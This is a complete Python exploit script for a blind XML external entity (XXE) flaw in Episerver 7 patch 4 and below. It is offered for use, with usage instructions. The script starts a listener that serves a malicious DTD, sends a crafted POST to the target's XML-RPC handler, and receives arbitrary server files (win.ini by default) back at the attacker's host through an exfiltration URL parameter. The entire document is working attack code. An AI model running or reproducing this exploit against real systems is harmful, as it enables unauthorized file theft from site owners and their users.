Episerver XXE Exploit

1. #!/usr/bin/python
2. ##
3. ## episploit.py - Blind XXE file read exploit for Episerver 7 patch 4 and below
4. ##
5. ## Starts a listening webserver, so the exploits needs a public IP and unfiltered port, configure RHOST below!
6. ##
7. ## Written by Jonas Lejon 2017-12-19 <jonas.xxe@triop.se> https://triop.se
8. ## Based on https://gist.github.com/mgeeky/7f45c82e8d3097cbbbb250e37bc68573
9. ##
10. ## Usage: ./episploit.py <target> [file-to-read]
11. ##
12.  
13. from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
14. import urllib
15. import re
16. import sys
17. import time
18. import threading
19. import socket
20.  
21. SERVER_SOCKET   = ('0.0.0.0', 8000)
22. EXFIL_FILE      = 'file:///c:/windows/win.ini'
23.  
24. # The public facing IP. Change this
25. RHOST           = '1.2.3.4:' + str(SERVER_SOCKET[1])
26.  
27. EXFILTRATED_EVENT = threading.Event()
28.  
29. class BlindXXEServer(BaseHTTPRequestHandler):
30.  
31.     def response(self, **data):
32.         code = data.get('code', 200)
33.         content_type = data.get('content_type', 'text/plain')
34.         body = data.get('body', '')
35.  
36.         self.send_response(code)
37.         self.send_header('Content-Type', content_type)
38.         self.end_headers()
39.         self.wfile.write(body.encode('utf-8'))
40.         self.wfile.close()
41.  
42.     def do_GET(self):
43.         self.request_handler(self)
44.  
45.     def do_POST(self):
46.         self.request_handler(self)
47.  
48.     def log_message(self, format, *args):
49.         return
50.  
51.     def request_handler(self, request):
52.         global EXFILTRATED_EVENT
53.  
54.         path = urllib.unquote(request.path).decode('utf8')
55.         m = re.search('\/\?exfil=(.*)', path, re.MULTILINE)
56.         if m and request.command.lower() == 'get':
57.             data = path[len('/?exfil='):]
58.             print 'Exfiltrated %s:' % EXFIL_FILE
59.             print '-' * 30
60.             print urllib.unquote(data).decode('utf8')
61.             print '-' * 30 + '\n'
62.             self.response(body='true')
63.  
64.             EXFILTRATED_EVENT.set()
65.  
66.         elif request.path.endswith('.dtd'):
67.             print 'Sending malicious DTD file.'
68.             dtd = '''<!ENTITY %% param_exfil SYSTEM "%(exfil_file)s">
69. <!ENTITY %% param_request "<!ENTITY exfil SYSTEM 'http://%(exfil_host)s/?exfil=%%param_exfil;'>">
70. %%param_request;''' % {'exfil_file' : EXFIL_FILE, 'exfil_host' : RHOST}
71.  
72.             self.response(content_type='text/xml', body=dtd)
73.  
74.         else:
75.             print '[INFO] %s %s' % (request.command, request.path)
76.             self.response(body='false')
77.  
78. def send_stage1(target):
79.     content = '''<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://''' + RHOST + '''/test.dtd"><foo>&exfil;</foo>'''
80.     payload = '''POST /util/xmlrpc/Handler.ashx?pageid=1023 HTTP/1.1
81. Host: ''' + target + '''
82. User-Agent: curl/7.54.0
83. Accept: */*
84. Content-Length: ''' + str(len(content)) + '''
85. Content-Type: application/x-www-form-urlencoded
86. Connection: close
87.  
88. ''' + content
89.  
90.     print "Sending payload.."
91.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
92.     port = 80
93.     s.connect((target,port))
94.     s.send(payload)
95.  
96. def main(target):
97.     server = HTTPServer(SERVER_SOCKET, BlindXXEServer)
98.     thread = threading.Thread(target=server.serve_forever)
99.     thread.daemon = True
100.     thread.start()
101.     send_stage1(target)
102.  
103.     while not EXFILTRATED_EVENT.is_set():
104.         pass
105.  
106. if __name__ == '__main__':
107.     if len(sys.argv) > 1:
108.         target = sys.argv[1]
109.     if len(sys.argv) > 2:
110.         EXFIL_FILE = sys.argv[2]
111.     main(target)